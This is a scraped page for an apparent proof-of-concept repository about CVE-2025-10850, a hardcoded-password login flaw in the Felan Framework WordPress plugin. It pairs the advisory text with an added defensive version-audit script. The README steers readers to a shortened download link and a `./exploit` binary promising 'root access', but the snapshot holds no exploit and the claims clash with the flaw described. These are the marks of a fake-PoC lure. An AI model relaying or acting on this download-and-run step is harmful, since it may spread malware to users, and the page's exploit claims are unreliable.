CVE-2025-10850 PoC — Felan Framework <= 1.1.4 - Hardcoded Credentials

Associated Vulnerability
Title: Felan Framework <= 1.1.4 - Hardcoded Credentials (CVE-2025-10850)
Description: The Felan Framework plugin for WordPress is vulnerable to improper authentication in versions up to, and including, 1.1.4. This is due to the hardcoded password in the 'fb_ajax_login_or_register' function and in the 'google_ajax_login_or_register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, if they registered with Facebook or Google social login and did not change their password. CVE-2025-23504 is likely a duplicate of this issue.
Readme
# CVE-2025-10850

## Overview

The Felan Framework plugin for WordPress contains a vulnerability that allows improper authentication due to hardcoded passwords in its login functions.

## Vulnerability Details

Specifically, this impacts users who log in using Facebook or Google social login features, as they may remain vulnerable if they did not change their default passwords. Attackers can exploit this flaw to log in as any existing user, thereby potentially gaining unauthorized access to sensitive user data and site functionalities.

### Key Points

- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Attack Vector**: Network

Understanding the nature of this vulnerability is crucial for system administrators and security professionals. Proper mitigation strategies can prevent unauthorized access.
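
A defender-side check for the affected range described above, added here as an example (it is not code from this repository or from the plugin): it walks a WordPress plugins directory, reads each plugin's header comment, and flags copies of Felan Framework at or below 1.1.4. The `Plugin Name:` value matched, the status labels, and the sample tree built by `demo()` are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

LAST_AFFECTED = (1, 1, 4)        # advisory: versions up to and including 1.1.4
PLUGIN_NAME = "felan framework"  # assumed "Plugin Name:" header value, lower-cased
HEADER = re.compile(r"^[ \t/*#@]*(Plugin Name|Version):(.*)$", re.I | re.M)

def parse_version(text):
    """'1.1.4' -> (1, 1, 4); pads short versions; None if no leading number."""
    m = re.match(r"\d+(?:\.\d+)*", (text or "").strip())
    parts = [int(p) for p in m.group().split(".")] if m else []
    return tuple(parts + [0] * (3 - len(parts))) if parts else None

def read_header(php_file):
    """Header fields from the first 8 KB (where WordPress looks); first match wins."""
    head = php_file.read_bytes()[:8192].decode("utf-8", "replace")
    return {k.lower(): v.strip() for k, v in reversed(HEADER.findall(head))}

def audit(plugins_dir):
    """Return (folder, version, status) for every Felan Framework copy found."""
    results = []
    for php_file in sorted(Path(plugins_dir).glob("*/*.php")):
        fields = read_header(php_file)
        if fields.get("plugin name", "").lower() != PLUGIN_NAME:
            continue
        parsed = parse_version(fields.get("version"))
        if parsed is None:
            status = "unknown"  # no usable Version header: review by hand
        elif parsed <= LAST_AFFECTED:
            status = "affected"
        else:
            status = "outside-advisory-range"
        results.append((php_file.parent.name, fields.get("version"), status))
    return results

def demo():
    """Constructed tree: folder names and version numbers are made up."""
    samples = {"felan-old": " * Version: 1.1.4", "felan-new": " * Version: 1.2.0",
               "felan-odd": " * Description: header without a version"}
    with tempfile.TemporaryDirectory() as root:
        for folder, line in samples.items():
            Path(root, folder).mkdir()
            Path(root, folder, "main.php").write_text(
                f"<?php\n/**\n * Plugin Name: Felan Framework\n{line}\n */\n")
        return audit(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

On a real site, pass the path of `wp-content/plugins` to `audit()`; accounts created through the plugin's Facebook or Google login on an affected install are the ones whose passwords need resetting.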


### Important Note

Use this exploit responsibly and only on systems you own or have explicit permission to test.

## Example

Here is a simple example of how to use the exploit:

1. Open your terminal.
2. Run the exploit:

   ```bash
   ./exploit
   ```

3. If successful, you will see a message indicating that you have gained root access.

### Download [here](https://tinyurl.com/3mmysj2n)
File Snapshot

[4.0K] /data/pocs/364141e56ed726f7ee5a3a18a7b2b7dfd3d1bbd9
└── [1.2K] README.md

0 directories, 1 file